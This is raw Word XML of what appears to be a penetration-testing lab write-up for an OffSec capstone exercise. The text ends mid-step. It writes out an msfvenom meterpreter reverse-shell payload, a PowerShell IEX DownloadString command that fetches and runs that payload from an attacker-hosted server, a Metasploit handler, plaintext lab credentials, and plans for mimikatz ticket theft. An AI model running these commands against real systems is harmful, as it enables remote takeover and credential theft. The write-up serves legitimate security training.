    <w:p w14:paraId="1A0E9E1D" w14:textId="51D21187" w:rsidR="00C94494" w:rsidRPr="00C94494" w:rsidRDefault="00C94494" w:rsidP="00892126">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C94494">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>impacket-wmiexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C94494">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> corp.com/leon:’HomeTaping199!’@192.168.196.73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FB6621" w14:textId="77777777" w:rsidR="00C94494" w:rsidRDefault="00C94494" w:rsidP="00892126"/>
    <w:p w14:paraId="4B73C513" w14:textId="77777777" w:rsidR="005D28C7" w:rsidRDefault="005D28C7" w:rsidP="00892126">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="715D8562" wp14:editId="17B3D7DF">
            <wp:extent cx="8229600" cy="3773805"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1762065950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65950" name="Picture 2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0A6A" w14:textId="77777777" w:rsidR="005D28C7" w:rsidRDefault="005D28C7" w:rsidP="00892126"/>
    <w:p w14:paraId="7B2962E1" w14:textId="77777777" w:rsidR="005D28C7" w:rsidRDefault="005D28C7" w:rsidP="00892126"/>
    <w:p w14:paraId="4AD7A8F4" w14:textId="77777777" w:rsidR="005D28C7" w:rsidRDefault="005D28C7" w:rsidP="00892126"/>
    <w:p w14:paraId="2412AB64" w14:textId="77777777" w:rsidR="005D28C7" w:rsidRDefault="005D28C7" w:rsidP="00892126"/>
    <w:p w14:paraId="44FB0E61" w14:textId="48F661DE" w:rsidR="005D28C7" w:rsidRDefault="00E403F7" w:rsidP="00892126">
      <w:r w:rsidRPr="00E403F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 11:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E403F7">
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>The flag is at C:\Users\Administrator\Desktop\proof.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B452D9F" w14:textId="77777777" w:rsidR="005D28C7" w:rsidRDefault="005D28C7" w:rsidP="00892126"/>
    <w:p w14:paraId="41D4C554" w14:textId="6380AD7A" w:rsidR="00892126" w:rsidRDefault="00B74A5B" w:rsidP="00892126">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A8BFCA8" wp14:editId="3E9FE8D4">
            <wp:extent cx="8229600" cy="3047365"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="234342538" name="Picture 23" descr="A black square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2538" name="Picture 23" descr="A black square with a blue backgrou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126">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="750969A3" w14:textId="77C4D4AE" w:rsidR="00892126" w:rsidRDefault="00892126" w:rsidP="00892126">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc147493197"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Capstone Exercise 23.2.2 #4</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="05269951" w14:textId="77777777" w:rsidR="00892126" w:rsidRDefault="00892126" w:rsidP="00892126">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc147493198"/>
      <w:r>
        <w:t>Path to Compromise</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="61760CD4" w14:textId="77777777" w:rsidR="00B24B07" w:rsidRDefault="00B24B07" w:rsidP="00B24B07"/>
    <w:p w14:paraId="5838C8E8" w14:textId="470E1884" w:rsidR="00B24B07" w:rsidRPr="00B24B07" w:rsidRDefault="00B24B07" w:rsidP="00B24B07">
      <w:r>
        <w:t xml:space="preserve">In this challenge, access to “client76” is gained through RDP using provided credentials. A PowerShell payload is created and hosted on a Python Server. A Metasploit listener is set up, and PowerShell is run as an administrator to initiate a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session, elevating privileges to NT AUTHRORITY\SYSTEM. The objective includes locating mimikatz.exe, checking web04 shared folder access, extracting a TGT ticket, and using it to access the web04 shares folder for the flag retrieval via ‘type \web04\backup\proof.txt’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570FD188" w14:textId="77777777" w:rsidR="00B24B07" w:rsidRPr="00B24B07" w:rsidRDefault="00B24B07" w:rsidP="00B24B07"/>
    <w:p w14:paraId="4EE0AF65" w14:textId="77777777" w:rsidR="005464F3" w:rsidRDefault="005464F3" w:rsidP="00892126">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CB7A16B" w14:textId="77777777" w:rsidR="005464F3" w:rsidRDefault="005464F3" w:rsidP="00892126">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61AE90A1" w14:textId="77777777" w:rsidR="005464F3" w:rsidRDefault="005464F3" w:rsidP="00892126">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79F1886E" w14:textId="77777777" w:rsidR="005464F3" w:rsidRDefault="005464F3" w:rsidP="00892126">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF51FB3" w14:textId="77777777" w:rsidR="005464F3" w:rsidRDefault="005464F3" w:rsidP="00892126">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="752F5E83" w14:textId="77777777" w:rsidR="005464F3" w:rsidRDefault="005464F3" w:rsidP="00892126">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="673E0E0D" w14:textId="77777777" w:rsidR="005464F3" w:rsidRDefault="005464F3" w:rsidP="00892126">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75468F8F" w14:textId="77777777" w:rsidR="005464F3" w:rsidRDefault="005464F3" w:rsidP="00892126">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C1EF229" w14:textId="77777777" w:rsidR="005464F3" w:rsidRDefault="005464F3" w:rsidP="00892126">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1353A597" w14:textId="77777777" w:rsidR="005464F3" w:rsidRDefault="005464F3" w:rsidP="00892126">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C74B01B" w14:textId="77777777" w:rsidR="005464F3" w:rsidRDefault="005464F3" w:rsidP="00892126">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E53E44E" w14:textId="77777777" w:rsidR="005464F3" w:rsidRDefault="005464F3" w:rsidP="00892126">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34DF1CAC" w14:textId="77777777" w:rsidR="005464F3" w:rsidRDefault="005464F3" w:rsidP="00892126">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6770D64F" w14:textId="77777777" w:rsidR="005464F3" w:rsidRDefault="005464F3" w:rsidP="005464F3"/>
    <w:p w14:paraId="676CB5A6" w14:textId="77777777" w:rsidR="00B24B07" w:rsidRPr="005464F3" w:rsidRDefault="00B24B07" w:rsidP="005464F3"/>
    <w:p w14:paraId="515C6FB2" w14:textId="752CC4B2" w:rsidR="00892126" w:rsidRDefault="00892126" w:rsidP="00892126">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri Light" w:hAnsi="Calibri Light"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc147493199"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="5E7936BC" w14:textId="4F089C33" w:rsidR="00CF78EE" w:rsidRDefault="00CF78EE" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B33FB8C" w14:textId="77777777" w:rsidR="003F1E2F" w:rsidRDefault="003F1E2F" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D33D9C3" w14:textId="6FB40ED1" w:rsidR="003F1E2F" w:rsidRDefault="003F1E2F" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="007A4CDF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="007A4CDF">
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Credentials for client76 are provided on offsec portal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47913C71" w14:textId="77777777" w:rsidR="005464F3" w:rsidRDefault="005464F3" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11A5623E" w14:textId="16A4CC60" w:rsidR="005464F3" w:rsidRDefault="003F1E2F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4B413B0B" wp14:editId="33221C2E">
            <wp:extent cx="8229600" cy="3700780"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="61286351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63510" name="Picture 2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205" w14:textId="77777777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192B336A" w14:textId="77777777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696CA863" w14:textId="77777777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68A2D373" w14:textId="77777777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3C9A0857" w14:textId="77777777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0D860351" w14:textId="77777777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6FEF7700" w14:textId="77777777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0FE539B0" w14:textId="724904F4" w:rsidR="007A4CDF" w:rsidRDefault="007A4CDF" w:rsidP="007A4CDF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7373D5">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2: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RDP into client7</w:t>
      </w:r>
      <w:r w:rsidR="00A84DE6">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xfreerdp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and provide the credentials and target system IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E2CC9B" w14:textId="77777777" w:rsidR="007A4CDF" w:rsidRDefault="007A4CDF" w:rsidP="007A4CDF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02D054F1" w14:textId="1243ED32" w:rsidR="007A4CDF" w:rsidRPr="009272F9" w:rsidRDefault="007A4CDF" w:rsidP="007A4CDF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xfreerdp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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009272F9">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>u:leon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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p:’</w:t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HomeTaping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>!’ /v:</w:t>
      </w:r>
      <w:r w:rsidR="004F01E9">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.250.76</w:t>
      </w:r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/w:1920 /h:1080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501AF4C3" w14:textId="0D5753FB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114ECD08" w14:textId="77777777" w:rsidR="007A4CDF" w:rsidRDefault="007A4CDF" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="358FAF44" w14:textId="11AF0748" w:rsidR="007A4CDF" w:rsidRDefault="007A4CDF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02B71958" wp14:editId="3A2B888B">
            <wp:extent cx="8229600" cy="3741420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="197907047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0479" name="Picture 25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360E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1C395F4E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7A74E25D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02543DD1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09EB43C5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35B63FE9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498B6FFB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38F18A92" w14:textId="77777777" w:rsidR="00C85463" w:rsidRDefault="00C85463" w:rsidP="00C85463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077329">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00077329">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="00B0F0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Create a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powershell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payload with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom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and host it on a python server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255DC98C" w14:textId="77777777" w:rsidR="00C85463" w:rsidRDefault="00C85463" w:rsidP="00C85463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A09D6C7" w14:textId="77777777" w:rsidR="00C85463" w:rsidRDefault="00C85463" w:rsidP="00C85463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msfvenom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p windows/x64/</w:t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meterpreter_reverse_tcp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LHOST=&lt;LOCAL IP&gt; LPORT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=4242</w:t>
      </w:r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f </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009272F9">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>psh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009272F9">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -o run_meterpreter.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06815EBF" w14:textId="77777777" w:rsidR="00C85463" w:rsidRDefault="00C85463" w:rsidP="00C85463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</w:p>
    <w:p w14:paraId="2C1C7FAF" w14:textId="77777777" w:rsidR="00C85463" w:rsidRDefault="00C85463" w:rsidP="00C85463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python3 -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8888</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B293FD9" w14:textId="77777777" w:rsidR="00C85463" w:rsidRDefault="00C85463" w:rsidP="00C85463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</w:p>
    <w:p w14:paraId="75268531" w14:textId="77777777" w:rsidR="00C85463" w:rsidRPr="009272F9" w:rsidRDefault="00C85463" w:rsidP="00C85463">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B321192" w14:textId="2E553F72" w:rsidR="00C85463" w:rsidRDefault="00C85463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176FC25F" wp14:editId="43A4C28A">
            <wp:extent cx="8229600" cy="1350645"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="394671879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71879" name="Picture 27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484A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7C2D0EFA" w14:textId="2C926A12" w:rsidR="00C85463" w:rsidRDefault="00C85463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07FC0BE9" wp14:editId="48C94FB6">
            <wp:extent cx="8229600" cy="1765935"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1738006884" name="Picture 2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6884" name="Picture 28" descr="A computer screen with white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EAC6" w14:textId="77777777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32358877" w14:textId="647D0A19" w:rsidR="00C85463" w:rsidRDefault="00C85463" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E7DD2D0" w14:textId="77777777" w:rsidR="00A84DE6" w:rsidRDefault="00A84DE6" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0405671B" w14:textId="77777777" w:rsidR="00A84DE6" w:rsidRDefault="00A84DE6" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="698B32CE" w14:textId="77777777" w:rsidR="00A84DE6" w:rsidRDefault="00A84DE6" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6847B01C" w14:textId="77777777" w:rsidR="00A84DE6" w:rsidRDefault="00A84DE6" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A9782FB" w14:textId="77777777" w:rsidR="00A84DE6" w:rsidRDefault="00A84DE6" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C29382D" w14:textId="77777777" w:rsidR="00A84DE6" w:rsidRDefault="00A84DE6" w:rsidP="00A84DE6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1D01B2">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="001D01B2">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="00B0F0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Create a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>powershell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shortcut on client74 Desktop with a shellcode runner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145CE6AD" w14:textId="77777777" w:rsidR="00A84DE6" w:rsidRPr="00122D2B" w:rsidRDefault="00A84DE6" w:rsidP="00A84DE6">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>powershell.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ExecutionPolicy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Bypass -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NoExit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -c "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IEX(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>New-Object System.Net.WebClient).DownloadString('http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;LOCAL_IP&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00122D2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:8888/run_meterpreter.ps1')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6129F19D" w14:textId="77777777" w:rsidR="00A84DE6" w:rsidRDefault="00A84DE6" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BF26579" w14:textId="77777777" w:rsidR="00A84DE6" w:rsidRDefault="00A84DE6" w:rsidP="005464F3">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F3AA3AA" w14:textId="206A1454" w:rsidR="00A84DE6" w:rsidRDefault="00535B70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209A9D34" wp14:editId="5D0594D5">
            <wp:extent cx="8229600" cy="3837940"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="565689637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9637" name="Picture 29" descr="A screen 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94B4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65DA5340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5FE28BA8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600C57E2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5AF9654E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462C8B47" w14:textId="77777777" w:rsidR="00A440A4" w:rsidRDefault="00A440A4" w:rsidP="00A440A4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4E7E09">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 5:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Create a Metasploit listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E7F9B7" w14:textId="77777777" w:rsidR="00A440A4" w:rsidRDefault="00A440A4" w:rsidP="00A440A4">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F63A093" w14:textId="77777777" w:rsidR="00A440A4" w:rsidRPr="00A468F5" w:rsidRDefault="00A440A4" w:rsidP="00A440A4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Pr="00A468F5">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use exploit/multi/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A468F5">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>handler</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4C13D8A1" w14:textId="77777777" w:rsidR="00A440A4" w:rsidRPr="00A468F5" w:rsidRDefault="00A440A4" w:rsidP="00A440A4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LHOST &lt;LOCAL_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306A7F4B" w14:textId="77777777" w:rsidR="00A440A4" w:rsidRPr="00A468F5" w:rsidRDefault="00A440A4" w:rsidP="00A440A4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LPORT 4242</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A21BD1" w14:textId="77777777" w:rsidR="00A440A4" w:rsidRPr="00A468F5" w:rsidRDefault="00A440A4" w:rsidP="00A440A4">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs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set PAYLOAD windows/x64/meterpreter_reverse_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A468F5">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6611E3E9" w14:textId="77777777" w:rsidR="00A440A4" w:rsidRDefault="00A440A4" w:rsidP="00A440A4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A468F5">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>run -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A468F5">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
